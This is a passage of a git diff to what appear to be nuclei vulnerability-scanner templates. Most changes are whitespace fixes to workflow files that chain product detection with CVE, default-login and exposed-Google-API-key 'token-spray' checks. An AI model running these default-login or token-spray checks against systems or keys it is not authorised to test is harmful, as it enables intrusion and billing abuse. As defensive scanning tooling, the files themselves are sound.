cipher is defined as an encryption/decryption algorithm that uses a key of insufficient length. Using an insufficient length for a key in an encryption/decryption algorithm opens up the possibility (or probability) that the encryption scheme could be broken. reference: - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ - http://ciphersuite.info - description: - A weak cipher is defined as an encryption/decryption algorithm that uses a key of insufficient length. Using an insufficient length for a key - in an encryption/decryption algorithm opens up the possibility (or probability) that the encryption scheme could be broken. - tags: ssl,tls,misconfig metadata: max-request: 4 - + tags: ssl,tls,misconfig ssl: - address: "{{Host}}:{{Port}}" min_version: tls10 @@ -23,7 +20,6 @@ ssl: - type: dsl dsl: - "tls_version, cipher" - matchers: - type: word name: tls-1.0 @@ -235,7 +231,6 @@ ssl: - type: dsl dsl: - "tls_version, cipher" - matchers: - type: word name: tls-1.1 @@ -447,7 +442,6 @@ ssl: - type: dsl dsl: - "tls_version, cipher" - matchers: - type: word name: tls-1.2 @@ -659,7 +653,6 @@ ssl: - type: dsl dsl: - "tls_version, cipher" - matchers: - type: word name: tls-1.3 diff --git a/workflows/74cms-workflow.yaml b/workflows/74cms-workflow.yaml index 09b176907d..d5f735527f 100644 --- a/workflows/74cms-workflow.yaml +++ b/workflows/74cms-workflow.yaml @@ -4,10 +4,9 @@ info: name: 74cms Security Checks author: daffainfo description: A simple workflow that runs all 74cms related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: 74cms subtemplates: - - tags: 74cms \ No newline at end of file + - tags: 74cms diff --git a/workflows/acrolinx-workflow.yaml b/workflows/acrolinx-workflow.yaml index f389fcfac1..4107741f41 100644 --- a/workflows/acrolinx-workflow.yaml +++ b/workflows/acrolinx-workflow.yaml @@ -4,7 +4,6 @@ info: name: Acrolinx Security Checks author: daffainfo description: A simple workflow that runs all Acrolinx related nuclei templates on a given target. - workflows: - template: http/exposed-panels/acrolinx-dashboard.yaml subtemplates: diff --git a/workflows/activemq-workflow.yaml b/workflows/activemq-workflow.yaml index d9b6cf76f3..e32c0b9b47 100644 --- a/workflows/activemq-workflow.yaml +++ b/workflows/activemq-workflow.yaml @@ -4,7 +4,6 @@ info: name: ActiveMQ Security Checks author: daffainfo description: A simple workflow that runs all ActiveMQ related nuclei templates on a given target. - workflows: - template: http/exposed-panels/activemq-panel.yaml subtemplates: diff --git a/workflows/adminer-workflow.yaml b/workflows/adminer-workflow.yaml index c5de903f61..911a77189f 100644 --- a/workflows/adminer-workflow.yaml +++ b/workflows/adminer-workflow.yaml @@ -4,8 +4,7 @@ info: name: Adminer Security Checks author: daffainfo description: A simple workflow that runs all Adminer related nuclei templates on a given target. - workflows: - template: http/exposed-panels/adminer-panel.yaml subtemplates: - - tags: adminer \ No newline at end of file + - tags: adminer diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index 2db6613fb7..0b648b39e8 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -4,7 +4,6 @@ info: name: Adobe Experience Manager Security Checks author: dhiyaneshDK description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. - workflows: - template: http/technologies/aem-detect.yaml subtemplates: diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index ca22b3d4e8..dc2bc25100 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -4,9 +4,7 @@ info: name: Apache Airflow Security Checks author: pdteam description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. - workflows: - - template: http/technologies/apache/airflow-detect.yaml subtemplates: - - tags: airflow \ No newline at end of file + - tags: airflow diff --git a/workflows/ambari-workflow.yaml b/workflows/ambari-workflow.yaml index 14d49a8bc1..bc41b24b0d 100644 --- a/workflows/ambari-workflow.yaml +++ b/workflows/ambari-workflow.yaml @@ -4,7 +4,6 @@ info: name: Ambari Security Checks author: daffainfo description: A simple workflow that runs all Ambari related nuclei templates on a given target. - workflows: - template: http/exposed-panels/ambari-exposure.yaml subtemplates: diff --git a/workflows/apache-workflow.yaml b/workflows/apache-workflow.yaml index e8a6e582f2..d2016504cb 100644 --- a/workflows/apache-workflow.yaml +++ b/workflows/apache-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache workflow author: philippedelteil description: A simple workflow that runs all Apache related nuclei templates on a given target. - workflows: - template: http/technologies/apache/apache-detect.yaml subtemplates: diff --git a/workflows/apereo-cas-workflow.yaml b/workflows/apereo-cas-workflow.yaml index c05488b883..6e0ba934ec 100644 --- a/workflows/apereo-cas-workflow.yaml +++ b/workflows/apereo-cas-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apereo CAS Security Checks author: daffainfo description: A simple workflow that runs all Apereo CAS related nuclei templates on a given target. - workflows: - template: http/exposed-panels/cas-login.yaml subtemplates: diff --git a/workflows/apisix-workflow.yaml b/workflows/apisix-workflow.yaml index c203d5b1fa..5b997b89e5 100644 --- a/workflows/apisix-workflow.yaml +++ b/workflows/apisix-workflow.yaml @@ -4,8 +4,7 @@ info: name: Apache Apisix Security Checks author: daffainfo description: A simple workflow that runs all Apache Apisix related nuclei templates on a given target. - workflows: - template: http/exposed-panels/apache/apache-apisix-panel.yaml subtemplates: - - tags: apisix \ No newline at end of file + - tags: apisix diff --git a/workflows/artica-web-proxy-workflow.yaml b/workflows/artica-web-proxy-workflow.yaml index 3b2d9df1af..83bf335f40 100644 --- a/workflows/artica-web-proxy-workflow.yaml +++ b/workflows/artica-web-proxy-workflow.yaml @@ -4,8 +4,7 @@ info: name: Artica Web Proxy Security Checks author: dwisiswant0,pdteam description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. - workflows: - template: http/technologies/artica-web-proxy-detect.yaml subtemplates: - - template: http/cves/2020/CVE-2020-17505.yaml \ No newline at end of file + - template: http/cves/2020/CVE-2020-17505.yaml diff --git a/workflows/artifactory-workflow.yaml b/workflows/artifactory-workflow.yaml index 65cff159bf..3c921bc873 100644 --- a/workflows/artifactory-workflow.yaml +++ b/workflows/artifactory-workflow.yaml @@ -4,7 +4,6 @@ info: name: Artifactory Security Checks author: daffainfo description: A simple workflow that runs all Artifactory related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/avantfax-workflow.yaml b/workflows/avantfax-workflow.yaml index efdd207252..52820f8501 100644 --- a/workflows/avantfax-workflow.yaml +++ b/workflows/avantfax-workflow.yaml @@ -4,7 +4,6 @@ info: name: AvantFAX Security Checks author: daffainfo description: A simple workflow that runs all AvantFAX Pipeline related nuclei templates on a given target. - workflows: - template: http/exposed-panels/avantfax-panel.yaml subtemplates: diff --git a/workflows/aviatrix-workflow.yaml b/workflows/aviatrix-workflow.yaml index f4247887ce..befe9b3312 100644 --- a/workflows/aviatrix-workflow.yaml +++ b/workflows/aviatrix-workflow.yaml @@ -4,7 +4,6 @@ info: name: Aviatrix Controller Security Checks author: daffainfo description: A simple workflow that runs all Aviatrix Controller related nuclei templates on a given target. - workflows: - template: http/exposed-panels/aviatrix-panel.yaml subtemplates: diff --git a/workflows/axigen-workflow.yaml b/workflows/axigen-workflow.yaml index 9a0dccd201..8fac021938 100644 --- a/workflows/axigen-workflow.yaml +++ b/workflows/axigen-workflow.yaml @@ -4,8 +4,7 @@ info: name: Axigen Webmail Security Checks author: daffainfo description: A simple workflow that runs all Axigen Webmail related nuclei templates on a given target. - workflows: - template: http/exposed-panels/axigen-webmail.yaml subtemplates: - - tags: axigen \ No newline at end of file + - tags: axigen diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index af9aa498a4..0da0adc619 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -4,7 +4,6 @@ info: name: Azkaban Security Checks author: pdteam description: A simple workflow that runs all Azkaban related nuclei templates on a given target. - workflows: - template: http/exposed-panels/azkaban-web-client.yaml subtemplates: diff --git a/workflows/azure-workflow.yaml b/workflows/azure-workflow.yaml index ff106ce9ae..3b7dac148a 100644 --- a/workflows/azure-workflow.yaml +++ b/workflows/azure-workflow.yaml @@ -4,6 +4,5 @@ info: name: Azure Checks author: DhiyaneshDk description: A simple workflow that runs all Azure related nuclei templates on a given target. - workflows: - tags: azure diff --git a/workflows/b2evolution-workflow.yaml b/workflows/b2evolution-workflow.yaml index 9191db8935..593cbe4765 100644 --- a/workflows/b2evolution-workflow.yaml +++ b/workflows/b2evolution-workflow.yaml @@ -4,10 +4,9 @@ info: name: b2evolution CMS Security Checks author: daffainfo description: A simple workflow that runs all b2evolution CMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: b2evolution subtemplates: - - tags: b2evolution \ No newline at end of file + - tags: b2evolution diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 2047ef5963..9aac725967 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -4,7 +4,6 @@ info: name: F5 BIG-IP Security Checks author: dwisiswant0 description: A simple workflow that runs all BigIP related nuclei templates on a given target. - workflows: - template: http/technologies/bigip-config-utility-detect.yaml subtemplates: diff --git a/workflows/bitrix-workflow.yaml b/workflows/bitrix-workflow.yaml index d82aeb1fba..90111eff88 100644 --- a/workflows/bitrix-workflow.yaml +++ b/workflows/bitrix-workflow.yaml @@ -4,7 +4,6 @@ info: name: Bitrix Security Checks author: daffainfo description: A simple workflow that runs all Bitrix related nuclei templates on a given target. - workflows: - template: http/exposed-panels/bitrix-panel.yaml subtemplates: diff --git a/workflows/bomgar-workflow.yaml b/workflows/bomgar-workflow.yaml index f1cffb0a97..07c1f5e0bc 100644 --- a/workflows/bomgar-workflow.yaml +++ b/workflows/bomgar-workflow.yaml @@ -4,7 +4,6 @@ info: name: Bomgar Security Checks author: pdteam description: A simple workflow that runs all Bomgar related nuclei templates on a given target. - workflows: - template: http/exposed-panels/bomgar-login-panel.yaml subtemplates: diff --git a/workflows/bullwark-workflow.yaml b/workflows/bullwark-workflow.yaml index b38b51e2f0..37bf6d1afe 100644 --- a/workflows/bullwark-workflow.yaml +++ b/workflows/bullwark-workflow.yaml @@ -4,10 +4,9 @@ info: name: Bullwark Momentum Series Security Checks author: daffainfo description: A simple workflow that runs all Bullwark Momentum Series related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: bullwark subtemplates: - - tags: bullwark \ No newline at end of file + - tags: bullwark diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index d24a7d1913..fcca6a68be 100644 --- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -4,8 +4,7 @@ info: name: Cacti Checks author: pikpikcu description: A simple workflow that runs all Cacti related nuclei templates on a given target. - workflows: - template: http/exposed-panels/cacti-panel.yaml subtemplates: - - tags: cacti \ No newline at end of file + - tags: cacti diff --git a/workflows/centos-workflow.yaml b/workflows/centos-workflow.yaml index c277e4a47d..702fa4190c 100644 --- a/workflows/centos-workflow.yaml +++ b/workflows/centos-workflow.yaml @@ -4,7 +4,6 @@ info: name: Centos WebPanel Security Checks author: daffainfo description: A simple workflow that runs all Centos WebPanel related nuclei templates on a given target. - workflows: - template: http/exposed-panels/cwp-webpanel.yaml subtemplates: diff --git a/workflows/chamilo-workflow.yaml b/workflows/chamilo-workflow.yaml index ec2fdebf2d..5f4965d688 100644 --- a/workflows/chamilo-workflow.yaml +++ b/workflows/chamilo-workflow.yaml @@ -4,10 +4,9 @@ info: name: Chamilo LMS Security Checks author: daffainfo description: A simple workflow that runs all Chamilo LMS related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: chamilo subtemplates: - - tags: chamilo \ No newline at end of file + - tags: chamilo diff --git a/workflows/checkpoint-workflow.yaml b/workflows/checkpoint-workflow.yaml index cebbb050ab..27061a8559 100644 --- a/workflows/checkpoint-workflow.yaml +++ b/workflows/checkpoint-workflow.yaml @@ -4,7 +4,6 @@ info: name: Checkpoint Security Checks author: daffainfo description: A simple workflow that runs all Checkpoint related nuclei templates on a given target. - workflows: - template: http/exposed-panels/checkpoint-panel.yaml subtemplates: diff --git a/workflows/cherokee-workflow.yaml b/workflows/cherokee-workflow.yaml index 19126d150a..7c1ba6604a 100644 --- a/workflows/cherokee-workflow.yaml +++ b/workflows/cherokee-workflow.yaml @@ -4,10 +4,9 @@ info: name: Cherokee Security Checks author: daffainfo description: A simple workflow that runs all Cherokee related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: cherokee subtemplates: - - tags: cherokee \ No newline at end of file + - tags: cherokee diff --git a/workflows/circarlife-workflow.yaml b/workflows/circarlife-workflow.yaml index 552517f954..ee68b5368a 100644 --- a/workflows/circarlife-workflow.yaml +++ b/workflows/circarlife-workflow.yaml @@ -4,7 +4,6 @@ info: name: CirCarLife Security Checks author: daffainfo description: A simple workflow that runs all CirCarLife related nuclei templates on a given target. - workflows: - template: http/misconfiguration/installer/circarlife-setup.yaml subtemplates: diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 6be4b30c1b..bcaec720ed 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -4,10 +4,11 @@ info: name: Cisco ASA Security Checks author: flag007 description: A simple workflow that runs all Cisco ASA related nuclei templates on a given target. - workflows: - template: http/exposed-panels/cisco/cisco-asa-panel.yaml subtemplates: - template: http/cves/2020/CVE-2020-3187.yaml + - template: http/cves/2020/CVE-2020-3452.yaml - - template: http/cves/2018/CVE-2018-0296.yaml \ No newline at end of file + + - template: http/cves/2018/CVE-2018-0296.yaml diff --git a/workflows/cisco-meraki-workflow.yaml b/workflows/cisco-meraki-workflow.yaml index 28f17cf4ed..ac20fedc3d 100644 --- a/workflows/cisco-meraki-workflow.yaml +++ b/workflows/cisco-meraki-workflow.yaml @@ -4,10 +4,9 @@ info: name: Cisco Meraki Security Checks author: daffainfo description: A simple workflow that runs all Cisco Meraki related nuclei templates on a given target. - workflows: - template: http/technologies/favicon-detect.yaml matchers: - name: meraki subtemplates: - - tags: meraki \ No newline at end of file + - tags: meraki diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml index a19ba8eb41..58d354d0b2 100644 --- a/workflows/cockpit-workflow.yaml +++ b/workflows/cockpit-workflow.yaml @@ -4,10 +4,11 @@ info: name: Agentejo Cockpit Security Checks author: dwisiswant0 description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. - workflows: - template: http/technologies/cockpit-detect.yaml subtemplates: - template: http/cves/2020/CVE-2020-35846.yaml + - template: http/cves/2020/CVE-2020-35847.yaml - - template: http/cves/2020/CVE-2020-35848.yaml \ No newline at end of file + + - template: http/cves/2020/CVE-2020-35848.yaml diff --git a/workflows/cocoon-workflow.yaml b/workflows/cocoon-workflow.yaml index ec99a8e5bd..3e0a4c488f 100644 --- a/workflows/cocoon-workflow.yaml +++ b/workflows/cocoon-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Cocoon Security Checks author: daffainfo description: A simple workflow that runs all Apache Cocoon related nuclei templates on a given target. - workflows: - template: http/technologies/apache/apache-cocoon-detect.yaml subtemplates: diff --git a/workflows/coldfusion-workflow.yaml b/workflows/coldfusion-workflow.yaml index e73b54c30b..0f84821c7c 100644 --- a/workflows/coldfusion-workflow.yaml +++ b/workflows/coldfusion-workflow.yaml @@ -4,7 +4,6 @@ info: name: Adobe ColdFusion Security Checks author: daffainfo description: A simple workflow that runs all Adobe ColdFusion related nuclei templates on a given target. - workflows: - template: http/exposed-panels/coldfusion-administrator-login.yaml subtemplates: diff --git a/workflows/concrete-workflow.yaml b/workflows/concrete-workflow.yaml index 589ed9bd73..f8bef7fa5b 100644 --- a/workflows/concrete-workflow.yaml +++ b/workflows/concrete-workflow.yaml @@ -4,7 +4,6 @@ info: name: Concrete Security Checks author: dhiyaneshDK description: A simple workflow that runs all Concrete related nuclei templates on a given target. - workflows: - template: http/exposed-panels/concrete5/concrete5-panel.yaml subtemplates: diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index d89ef01236..0b557ebed9 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -4,9 +4,7 @@ info: name: Atlassian Confluence workflow author: philippedelteil description: Workflow that runs all Confluence related nuclei templates - workflows: - - template: http/technologies/confluence-detect.yaml subtemplates: - tags: confluence diff --git a/workflows/dahua-workflow.yaml b/workflows/dahua-workflow.yaml index e0ad03c5a8..3591844be1 100644 --- a/workflows/dahua-workflow.yaml +++ b/workflows/dahua-workflow.yaml @@ -4,10 +4,9 @@ info: name: Dahua Security Checks author: daffainfo description: A simple workflow that runs all Dahua related nuclei templates on a given target. - workflows: - template: http/technologies/favicon-detect.yaml matchers: - name: dahua subtemplates: - - tags: dahua \ No newline at end of file + - tags: dahua diff --git a/workflows/dedecms-workflow.yaml b/workflows/dedecms-workflow.yaml index cb39e35656..a6b4b7f670 100644 --- a/workflows/dedecms-workflow.yaml +++ b/workflows/dedecms-workflow.yaml @@ -4,7 +4,6 @@ info: name: DedeCMS Security Checks author: daffainfo description: A simple workflow that runs all DedeCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml index 2053d09b88..03b65efc24 100644 --- a/workflows/default-application-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -4,18 +4,29 @@ info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications - workflows: - template: http/technologies/apache/default-apache-test-all.yaml + - template: http/technologies/apache/xampp-default-page.yaml + - template: http/technologies/microsoft/default-iis7-page.yaml + - template: http/technologies/microsoft/default-windows-server-page.yaml + - template: http/technologies/microsoft/default-microsoft-azure-page.yaml + - template: http/technologies/default-asp-net-page.yaml + - template: http/technologies/nginx/default-nginx-page.yaml + - template: http/technologies/default-lighttpd-page.yaml + - template: http/technologies/default-django-page.yaml + - template: http/exposures/files/drupal-install.yaml + - template: http/technologies/oracle/default-oracle-application-page.yaml + - template: http/technologies/ibm/ibm-http-server.yaml - - template: http/technologies/default-detect-generic.yaml \ No newline at end of file + + - template: http/technologies/default-detect-generic.yaml diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index 837a04a4ac..a0d4b29d8e 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -4,7 +4,6 @@ info: name: Dell iDRAC Security Checks author: kophjager007,megamansec description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. - workflows: - template: http/technologies/dell/dell-idrac6-detect.yaml subtemplates: @@ -13,11 +12,13 @@ workflows: - template: http/technologies/dell/dell-idrac7-detect.yaml subtemplates: - template: http/cves/2018/CVE-2018-1207.yaml + - template: http/default-logins/dell/dell-idrac-default-login.yaml - template: http/technologies/dell/dell-idrac8-detect.yaml subtemplates: - template: http/cves/2018/CVE-2018-1207.yaml + - template: http/default-logins/dell/dell-idrac-default-login.yaml - template: http/technologies/dell/dell-idrac9-detect.yaml diff --git a/workflows/dolibarr-workflow.yaml b/workflows/dolibarr-workflow.yaml index 9b450cfa9c..795ef36d12 100644 --- a/workflows/dolibarr-workflow.yaml +++ b/workflows/dolibarr-workflow.yaml @@ -4,8 +4,7 @@ info: name: Dolibarr Security Checks author: daffainfo description: A simple workflow that runs all Dolibarr related nuclei templates on a given target. - workflows: - template: http/exposed-panels/dolibarr-panel.yaml subtemplates: - - tags: dolibarr \ No newline at end of file + - tags: dolibarr diff --git a/workflows/dotnetnuke-workflow.yaml b/workflows/dotnetnuke-workflow.yaml index 8f90a90260..52c2f78af7 100644 --- a/workflows/dotnetnuke-workflow.yaml +++ b/workflows/dotnetnuke-workflow.yaml @@ -4,10 +4,9 @@ info: name: DotNetNuke Security Checks author: daffainfo description: A simple workflow that runs all DotNetNuke related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: dotnetnuke subtemplates: - - tags: dotnetnuke \ No newline at end of file + - tags: dotnetnuke diff --git a/workflows/drupal-workflow.yaml b/workflows/drupal-workflow.yaml index 00e1b50758..9d1e6a2df3 100644 --- a/workflows/drupal-workflow.yaml +++ b/workflows/drupal-workflow.yaml @@ -4,10 +4,9 @@ info: name: Wordpress Security Checks author: daffainfo description: A simple workflow that runs all drupal related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: drupal subtemplates: - - tags: drupal \ No newline at end of file + - tags: drupal diff --git a/workflows/duomicms-workflow.yaml b/workflows/duomicms-workflow.yaml index 24574a7378..821166fa9f 100644 --- a/workflows/duomicms-workflow.yaml +++ b/workflows/duomicms-workflow.yaml @@ -4,10 +4,9 @@ info: name: DuomiCMS Security Checks author: daffainfo description: A simple workflow that runs all DuomiCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: duomicms subtemplates: - - tags: duomicms \ No newline at end of file + - tags: duomicms diff --git a/workflows/dynamicweb-workflow.yaml b/workflows/dynamicweb-workflow.yaml index b7fd0bd88f..d8ef1173cf 100644 --- a/workflows/dynamicweb-workflow.yaml +++ b/workflows/dynamicweb-workflow.yaml @@ -4,8 +4,7 @@ info: name: Dynamicweb Security Checks author: pdteam description: A simple workflow that runs all dynamicweb related nuclei templates on a given target. - workflows: - template: http/exposed-panels/dynamicweb-panel.yaml subtemplates: - - tags: dynamicweb \ No newline at end of file + - tags: dynamicweb diff --git a/workflows/emby-workflow.yaml b/workflows/emby-workflow.yaml index e07c8bdcb1..04f00990df 100644 --- a/workflows/emby-workflow.yaml +++ b/workflows/emby-workflow.yaml @@ -4,10 +4,9 @@ info: name: Emby Server Security Checks author: daffainfo description: A simple workflow that runs all Emby Server related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: emby subtemplates: - - tags: emby \ No newline at end of file + - tags: emby diff --git a/workflows/emerge-workflow.yaml b/workflows/emerge-workflow.yaml index b7a0e97272..d8bbd453a1 100644 --- a/workflows/emerge-workflow.yaml +++ b/workflows/emerge-workflow.yaml @@ -4,6 +4,5 @@ info: name: eMerge Checks author: DhiyaneshDk description: A simple workflow that runs all eMerge related nuclei templates on a given target. - workflows: - tags: emerge diff --git a/workflows/episerver-workflow.yaml b/workflows/episerver-workflow.yaml index ee16072ecb..e0b67be2fe 100644 --- a/workflows/episerver-workflow.yaml +++ b/workflows/episerver-workflow.yaml @@ -4,10 +4,9 @@ info: name: EpiServer Security Checks author: daffainfo description: A simple workflow that runs all EpiServer related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: episerver subtemplates: - - tags: episerver \ No newline at end of file + - tags: episerver diff --git a/workflows/feifeicms-workflow.yaml b/workflows/feifeicms-workflow.yaml index 01316d3c69..09e73b0874 100644 --- a/workflows/feifeicms-workflow.yaml +++ b/workflows/feifeicms-workflow.yaml @@ -4,10 +4,9 @@ info: name: FeiFeiCMS Security Checks author: daffainfo description: A simple workflow that runs all FeiFeiCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: feifeicms subtemplates: - - tags: feifeicms \ No newline at end of file + - tags: feifeicms diff --git a/workflows/finereport-workflow.yaml b/workflows/finereport-workflow.yaml index 4986c4ac43..1956010333 100644 --- a/workflows/finereport-workflow.yaml +++ b/workflows/finereport-workflow.yaml @@ -4,10 +4,9 @@ info: name: FineReport Security Checks author: daffainfo description: A simple workflow that runs all FineReport related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: finereport subtemplates: - - tags: finereport \ No newline at end of file + - tags: finereport diff --git a/workflows/fortinet-workflow.yaml b/workflows/fortinet-workflow.yaml index e00a17c5c4..7c4acdb864 100644 --- a/workflows/fortinet-workflow.yaml +++ b/workflows/fortinet-workflow.yaml @@ -4,7 +4,6 @@ info: name: Fortinet Security Checks author: daffainfo description: A simple workflow that runs all fortinet related nuclei templates on a given target. - workflows: - template: http/exposed-panels/fortinet/fortinet-panel.yaml subtemplates: diff --git a/workflows/gateone-workflow.yaml b/workflows/gateone-workflow.yaml index ad356aa658..548d67457b 100644 --- a/workflows/gateone-workflow.yaml +++ b/workflows/gateone-workflow.yaml @@ -4,10 +4,9 @@ info: name: GateOne Security Checks author: daffainfo description: A simple workflow that runs all GateOne related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: gateone subtemplates: - - tags: gateone \ No newline at end of file + - tags: gateone diff --git a/workflows/geowebserver-workflow.yaml b/workflows/geowebserver-workflow.yaml index 54aca7eca2..96f1772722 100644 --- a/workflows/geowebserver-workflow.yaml +++ b/workflows/geowebserver-workflow.yaml @@ -4,7 +4,6 @@ info: name: GeoWebServer Security Checks author: daffainfo description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target. - workflows: - template: http/technologies/geo-webserver-detect.yaml subtemplates: diff --git a/workflows/gespage-workflow.yaml b/workflows/gespage-workflow.yaml index 6e21586e07..b762c9b972 100644 --- a/workflows/gespage-workflow.yaml +++ b/workflows/gespage-workflow.yaml @@ -4,7 +4,6 @@ info: name: Gespage Security Checks author: daffainfo description: A simple workflow that runs all Gespage related nuclei templates on a given target. - workflows: - template: http/exposed-panels/gespage-panel.yaml subtemplates: diff --git a/workflows/gitlab-workflow.yaml b/workflows/gitlab-workflow.yaml index 94065b43d0..404f1ede85 100644 --- a/workflows/gitlab-workflow.yaml +++ b/workflows/gitlab-workflow.yaml @@ -4,8 +4,7 @@ info: name: GitLab Security Checks author: pdteam description: A simple workflow that runs all GitLab related nuclei templates on a given target. - workflows: - template: http/exposed-panels/gitlab-detect.yaml subtemplates: - - tags: gitlab \ No newline at end of file + - tags: gitlab diff --git a/workflows/gitlist-workflow.yaml b/workflows/gitlist-workflow.yaml index 1234cc9ce9..75cc567e29 100644 --- a/workflows/gitlist-workflow.yaml +++ b/workflows/gitlist-workflow.yaml @@ -4,10 +4,9 @@ info: name: GitList Security Checks author: daffainfo description: A simple workflow that runs all GitList related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: gitlist subtemplates: - - tags: gitlist \ No newline at end of file + - tags: gitlist diff --git a/workflows/glpi-workflow.yaml b/workflows/glpi-workflow.yaml index d748e5b4bd..b56e60a47c 100644 --- a/workflows/glpi-workflow.yaml +++ b/workflows/glpi-workflow.yaml @@ -4,7 +4,6 @@ info: name: GLPI Security Checks author: daffainfo description: A simple workflow that runs all GLPI Pipeline related nuclei templates on a given target. - workflows: - template: http/exposed-panels/glpi-panel.yaml subtemplates: diff --git a/workflows/gocd-workflow.yaml b/workflows/gocd-workflow.yaml index e6a3535842..d6f8802467 100644 --- a/workflows/gocd-workflow.yaml +++ b/workflows/gocd-workflow.yaml @@ -4,7 +4,6 @@ info: name: GoCD Security Checks author: dhiyaneshDk description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target. - workflows: - template: http/exposed-panels/gocd-login.yaml subtemplates: diff --git a/workflows/gogs-workflow.yaml b/workflows/gogs-workflow.yaml index 865c6623cd..d24cd11da9 100644 --- a/workflows/gogs-workflow.yaml +++ b/workflows/gogs-workflow.yaml @@ -4,7 +4,6 @@ info: name: Gogs (Go Git Service) - Security Checks author: daffainfo description: A simple workflow that runs all Gogs related nuclei templates on a given target. - workflows: - template: http/exposed-panels/gogs-panel.yaml subtemplates: diff --git a/workflows/google-api-enumeration-workflow.yaml b/workflows/google-api-enumeration-workflow.yaml index fab41b6be8..2a98eacd21 100644 --- a/workflows/google-api-enumeration-workflow.yaml +++ b/workflows/google-api-enumeration-workflow.yaml @@ -4,28 +4,49 @@ info: name: Google API Token Usage Enumeration author: tanq16 description: This template is a workflow that allows enumeration of usage capabilities for an exposed Google API Key. A key found or discovered in front-end or source code can be validated for authorization of use and can also be used to make multiple requests and produce high bills for the owner if usage is unrestricted - workflows: - template: http/token-spray/google-autocomplete.yaml + - template: http/token-spray/google-books.yaml + - template: http/token-spray/google-customsearch.yaml + - template: http/token-spray/google-directions.yaml + - template: http/token-spray/google-elevation.yaml + - template: http/token-spray/google-fcm.yaml + - template: http/token-spray/google-findplacefromtext.yaml + - template: http/token-spray/google-gedistancematrix.yaml + - template: http/token-spray/google-geocode.yaml + - template: http/token-spray/google-geolocation.yaml + - template: http/token-spray/google-mapsembed.yaml + - template: http/token-spray/google-mapsembedadvanced.yaml + - template: http/token-spray/google-nearbysearch.yaml + - template: http/token-spray/google-nearestroads.yaml + - template: http/token-spray/google-placedetails.yaml + - template: http/token-spray/google-placesphoto.yaml + - template: http/token-spray/google-playablelocations.yaml + - template: http/token-spray/google-routetotraveled.yaml + - template: http/token-spray/google-speedlimit.yaml + - template: http/token-spray/google-staticmaps.yaml + - template: http/token-spray/google-streetview.yaml + - template: http/token-spray/google-timezone.yaml - - template: http/token-spray/googlet-extsearchplaces.yaml \ No newline at end of file + + - template: http/token-spray/googlet-extsearchplaces.yaml diff --git a/workflows/gophish-workflow.yaml b/workflows/gophish-workflow.yaml index 972ac512e5..803743fd32 100644 --- a/workflows/gophish-workflow.yaml +++ b/workflows/gophish-workflow.yaml @@ -4,7 +4,6 @@ info: name: GoPhish Security Checks author: dhiyaneshDK description: A simple workflow that runs all Go-Phish related nuclei templates on a given target. - workflows: - template: http/exposed-panels/gophish-login.yaml subtemplates: diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 8e51480c21..f954c92d37 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ 